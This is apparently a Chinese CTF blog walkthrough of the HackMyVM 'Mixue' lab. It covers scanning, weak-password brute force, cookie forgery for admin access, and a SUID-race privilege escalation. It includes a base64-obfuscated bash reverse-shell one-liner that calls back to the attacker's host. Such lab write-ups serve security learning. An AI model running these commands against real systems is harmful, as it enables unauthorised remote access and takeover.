HackMyVM-Mixue

依旧是群友靶机,拿到了userflag。

信息收集

靶机IP:192.168.56.111

nmap扫描:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
nmap -T4 -A -v 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-02 10:57 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Initiating ARP Ping Scan at 10:57
Scanning 192.168.56.111 [1 port]
Completed ARP Ping Scan at 10:57, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:57
Completed Parallel DNS resolution of 1 host. at 10:57, 0.02s elapsed
Initiating SYN Stealth Scan at 10:57
Scanning 192.168.56.111 [1000 ports]
Discovered open port 22/tcp on 192.168.56.111
Discovered open port 80/tcp on 192.168.56.111
Completed SYN Stealth Scan at 10:57, 0.07s elapsed (1000 total ports)
Initiating Service scan at 10:57
Scanning 2 services on 192.168.56.111
Completed Service scan at 10:58, 6.03s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.111
NSE: Script scanning 192.168.56.111.
Initiating NSE at 10:58
Completed NSE at 10:58, 0.23s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.01s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.00s elapsed
Nmap scan report for 192.168.56.111
Host is up (0.00050s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: MIXUE Ice Cream & Tea - Official Site
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
MAC Address: 08:00:27:B7:D0:C7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Uptime guess: 25.680 days (since Wed May  7 18:38:39 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 192.168.56.111

NSE: Script Post-scanning.
Initiating NSE at 10:58
Completed NSE at 10:58, 0.00s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.00s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.286KB)

dirsearch:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
 _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                    
                                                                                                                                                           
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/_192.168.56.111/_25-06-02_10-59-08.txt

Target: http://192.168.56.111/

[10:59:08] Starting:                                                                                                                                       
[10:59:09] 403 -  279B  - /.ht_wsr.txt                                      
[10:59:09] 403 -  279B  - /.htaccess.orig                                   
[10:59:09] 403 -  279B  - /.htaccess.sample
[10:59:09] 403 -  279B  - /.htaccess.save
[10:59:09] 403 -  279B  - /.htaccess_extra                                  
[10:59:09] 403 -  279B  - /.htaccess_orig                                   
[10:59:09] 403 -  279B  - /.htaccess_sc
[10:59:09] 403 -  279B  - /.htaccessBAK
[10:59:09] 403 -  279B  - /.htaccessOLD
[10:59:09] 403 -  279B  - /.htaccessOLD2
[10:59:09] 403 -  279B  - /.html                                            
[10:59:09] 403 -  279B  - /.htm
[10:59:09] 403 -  279B  - /.htpasswd_test                                   
[10:59:09] 403 -  279B  - /.httr-oauth                                      
[10:59:09] 403 -  279B  - /.htpasswds
[10:59:10] 403 -  279B  - /.htaccess.bak1                                   
[10:59:10] 403 -  279B  - /.php                                             
[10:59:18] 302 -    0B  - /dashboard.php  ->  login.php                     
[10:59:23] 200 -  832B  - /login.php                                        
[10:59:30] 403 -  279B  - /server-status                                    
[10:59:30] 403 -  279B  - /server-status/                                   
[10:59:35] 301 -  318B  - /uploads  ->  http://192.168.56.111/uploads/      
[10:59:35] 200 -  407B  - /uploads/

gobuster:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
gobuster dir -u 192.168.56.111 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.111
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 20196]
/.html                (Status: 403) [Size: 279]
/login.php            (Status: 200) [Size: 2189]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.56.111/uploads/]
/dashboard.php        (Status: 302) [Size: 0] [--> login.php]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

开放了22和80端口,经典的index,login,dashboard三件套,还有个uploads,一开始我以为是可以自己传恶意文件上去的,后来发现想多了。

访问index.html,是个静态页面,什么东西都不能点,底下的发送email订阅也只是个架子,没法真的发东西。

再访问/uploads/,同样的空界面,没有上传按钮,源码没东西。

Getshell

只能访问login了,是个经典的登录界面,用admin试试常见的字典,没有成功。

这时候我们回看index的最底下,有个sublarge的邮箱,通常情况下,这就是网站管理员的账户邮箱,我们换上sublarge的用户名再爆破一次,得到使用了弱口令123456,成功登录。

(其实这里不光有admin和sublarge账户,还有一些弱口令比如test,guest账户,不过权限都是wwwdata,没有区别)

又提示我们没有管理员权限,抓包查看,发现管理员权限是通过cookie管理的。

修改cookie,得到一个命令执行界面,反弹shell到我们的主机上。

1
printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDQvNDQ0NCAwPiYxKSAm|base64 -d|bash

提权

拿到webshell之后先看看本地目录下有没有什么能用的东西,可惜没有。

这里的admin密码比较复杂,没法通过一般的字典爆出来,搞得我以为是ssh的密码浪费挺多时间的。

再看一下/home下面的用户,这里已经初见端倪了,有个用户组是属于root的。

看一下他名下的文件,第一个文件拿到sublarge的ssh登录密码。

1
find / -user suraxddq 2>/dev/null

事实上如果没有发现,也可以使用grep暴力获取。

1
grep "sublarge" -r -n / 2>/dev/null

ssh登录到sublarge上获取userflag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ssh sublarge@192.168.56.111
sublarge@192.168.56.111's password: 
Linux Mixue 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
sublarge@Mixue:~$ ls
user.txt
sublarge@Mixue:~$ cat user.txt 
flag{user-88c71208-3bbd-11f0-b2d7-000c2955ba04}

Root

回看之前suraxddq的文件,里面有一个key,还有一个logs。

1
2
3
4
5
6
7
8
9
10
11
12
13
www-data@Mixue:/home/suraxddq$ cat key
fix me
www-data@Mixue:/home/suraxddq$ cat logs
root@Mixue:~# cat /etc/systemd/system/key-monitor.service
[Unit]
Description=Key file monitor

[Service]
ExecStart=/usr/local/bin/monitor_key.sh
Restart=always

[Install]
WantedBy=multi-user.target

可以看出这个logs指向一个叫monitor_key的sh文件。

(事实上上传pspy等进程监视工具也可以直接看到)

1
2
3
4
5
6
www-data@Mixue:/home/suraxddq$ cat /usr/local/bin/monitor_key.sh
#!/bin/bash
inotifywait -m -e modify,attrib,close_write,move,delete /home/suraxddq/key |
while read; do
    /opt/change.sh
done

当key文件被修改时,自动执行change.sh文件。

1
2
3
4
5
6
7
8
www-data@Mixue:/home/suraxddq$ cat /opt/change.sh
#!/bin/bash


chown root:root /tmp/tmpfile 2>/dev/null
chmod 4755 /tmp/tmpfile 2>/dev/null
sleep 10
rm /tmp/tmpfile 2>/dev/null

用root权限执行/tmp/tmpfile文件。

利用链很清晰了,现在唯一的难点在于如何拿到修改key,也就是suraxddq的权限。

很简单,两个用户密码相同。(唉)

(事实上,所有用户包括root都是这个密码)(唉唉)

1
2
tmpfile-5.0# cat root.txt 
flag{root-8b360934-3bae-11f0-b977-000c2955ba04}

这个靶场的难度真的是非常简单了,千万注意信息收集和密码复用。

#渗透 #HVM
HackMyVM-Mixue
http://example.com/2025/06/02/HackMyVM-Mixue/
Author
Skyarrow
Posted on
June 2, 2025
Licensed under